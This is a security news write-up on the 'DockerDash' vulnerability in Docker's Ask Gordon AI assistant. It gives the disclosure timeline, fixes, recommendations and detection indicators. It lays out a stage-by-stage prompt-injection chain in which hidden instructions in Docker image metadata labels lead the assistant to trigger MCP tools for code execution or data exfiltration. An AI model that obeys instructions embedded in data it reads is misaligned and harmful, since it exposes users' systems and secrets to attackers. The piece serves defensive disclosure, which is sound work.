Security researchers at Noma Labs disclosed a critical vulnerability in Docker’s Ask Gordon AI assistant that allows attackers to compromise Docker environments through malicious image metadata. The flaw, dubbed DockerDash, demonstrates how AI assistants can become attack vectors when integrated into developer tooling.
Vulnerability overview
| Attribute | Details |
|---|
| Name | DockerDash |
| Discovery | Noma Labs (September 2025) |
| Affected product | Docker Desktop, Docker CLI |
| Feature | Ask Gordon AI assistant (beta) |
| Attack technique | Meta-context injection |
| Impact | Remote code execution, data exfiltration |
| Fixed version | Docker Desktop 4.50.0 |
| Fix date | November 6, 2025 |
Timeline
| Date | Event |
|---|
| September 17, 2025 | Noma Labs discovers and reports vulnerability |
| October 13, 2025 | Docker Security Team confirms vulnerability |
| November 6, 2025 | Docker Desktop 4.50.0 released with fixes |
| February 3, 2026 | Noma Labs publishes full technical details |
How the attack works
DockerDash exploits Docker’s AI assistant through a technique Noma Labs calls “meta-context injection”—hijacking an AI’s reasoning process through malicious metadata.
Attack chain
| Stage | Action |
|---|
| 1 | Attacker creates Docker image with malicious metadata label |
| 2 | Victim pulls/inspects the image using Ask Gordon |
| 3 | Gordon AI reads and interprets the malicious instruction |
| 4 | AI forwards instruction to MCP Gateway |
| 5 | MCP Gateway executes through MCP tools |
| 6 | Attacker achieves RCE or data exfiltration |
The critical flaw
“A single malicious metadata label in a Docker image can be used to compromise a Docker environment through a three-stage attack… Every stage happens with zero validation.”
— Noma Labs
The vulnerability exists because Ask Gordon processes image metadata without sanitization, and the Model Context Protocol (MCP) Gateway executes commands without validation.
Two attack paths
Path 1: Cloud/CLI systems (RCE)
| Factor | Details |
|---|
| Environment | Docker CLI, cloud deployments |
| Permissions | Full tool execution |
| Impact | Remote code execution |
| Severity | Critical |
On CLI and cloud systems, attackers can execute arbitrary code on the host system.
Path 2: Desktop applications (Data exfiltration)
| Factor | Details |
|---|
| Environment | Docker Desktop |
| Permissions | Read-only (restricted) |
| Impact | Sensitive data exfiltration |
| Severity | High |
While Docker Desktop restricts Ask Gordon to read-only permissions, attackers can still weaponize read access to exfiltrate sensitive internal data about the victim’s environment.
Meta-context injection technique
The attack exploits how AI assistants process context:
| Traditional prompt injection | Meta-context injection |
|---|
| Injects prompts via user input | Injects via metadata/labels |
| Requires user interaction | Triggered by image operations |
| Visible in conversation | Hidden in image metadata |
| Targets chat interface | Targets tool execution chain |
Why it works
| Factor | Vulnerability |
|---|
| AI reads metadata | Unfiltered input to reasoning |
| MCP Gateway trusts AI | No validation of AI requests |
| Tools execute blindly | No confirmation before execution |
| Metadata is invisible | Users don’t inspect labels |
Impact assessment
Affected operations
| Operation | Risk |
|---|
docker pull with Ask Gordon | Image metadata processed |
docker inspect via AI | Labels interpreted as instructions |
| Image analysis queries | Metadata included in context |
| Container debugging | Environment data exposed |
Data at risk
| Data type | Exposure risk |
|---|
| Environment variables | High |
| Mounted secrets | High |
| Container configurations | High |
| Network topology | Medium |
| Build arguments | Medium |
Docker’s mitigations
Docker implemented two key fixes:
Fix 1: URL rendering disabled
| Before | After |
|---|
| Ask Gordon rendered user-provided image URLs | URL rendering blocked |
| Exfiltration via image requests possible | Exfiltration path closed |
Fix 2: Human-in-the-loop confirmation
| Before | After |
|---|
| MCP tools executed automatically | Explicit user confirmation required |
| AI could trigger actions silently | User must approve tool invocations |
Recommendations
| Priority | Action |
|---|
| Critical | Update to Docker Desktop 4.50.0 or later |
| Critical | Update Docker CLI to latest version |
| High | Audit images from untrusted sources |
| High | Review recent Ask Gordon interactions |
Secure image management
| Control | Purpose |
|---|
| Use trusted registries | Reduce malicious image risk |
| Implement image scanning | Detect malicious content |
| Review image labels | Identify suspicious metadata |
| Limit Ask Gordon usage | Reduce attack surface |
For organizations
| Priority | Action |
|---|
| High | Inventory Docker Desktop versions |
| High | Push updates to developer machines |
| Medium | Establish AI tool usage policies |
| Medium | Monitor for unusual Docker activity |
Broader implications
DockerDash highlights emerging risks in AI-integrated developer tools:
AI supply chain risks
| Risk | Example |
|---|
| Metadata poisoning | Malicious labels in images |
| Context injection | Hijacking AI reasoning |
| Tool execution abuse | Weaponizing AI capabilities |
| Trust chain exploitation | AI trusts data, tools trust AI |
| Tool type | Similar risk |
|---|
| AI coding assistants | Code context injection |
| AI security tools | Log/alert manipulation |
| AI documentation tools | Content poisoning |
| AI debugging assistants | Environment data exposure |
Detection
Indicators of compromise
| Indicator | Detection method |
|---|
| Unusual Docker API calls | API logging |
| Unexpected MCP tool invocations | Ask Gordon audit logs |
| Data exfiltration attempts | Network monitoring |
| Suspicious image pulls | Registry access logs |
Organizations should implement automated scanning for suspicious image labels:
| Label pattern | Risk |
|---|
| Encoded/obfuscated content | Possible payload |
| URLs in labels | Exfiltration risk |
| Command-like strings | Injection attempt |
| Excessive label content | Context manipulation |
Context
DockerDash represents a new class of vulnerability emerging as AI assistants are integrated into developer tooling. The attack demonstrates that AI systems can be weaponized through their input processing—in this case, image metadata that developers rarely inspect.
The vulnerability also highlights the risks of the Model Context Protocol (MCP) and similar AI tool execution frameworks. When AI systems can invoke tools without validation, any input that influences AI reasoning becomes a potential attack vector.
Organizations adopting AI-powered developer tools should:
- Treat AI input sources as untrusted
- Require human confirmation for consequential actions
- Implement monitoring for AI tool usage
- Update promptly when security fixes are released
The rapid patching by Docker (within ~7 weeks of report) demonstrates responsible disclosure working effectively, but the underlying architectural risks in AI tooling remain an industry-wide concern.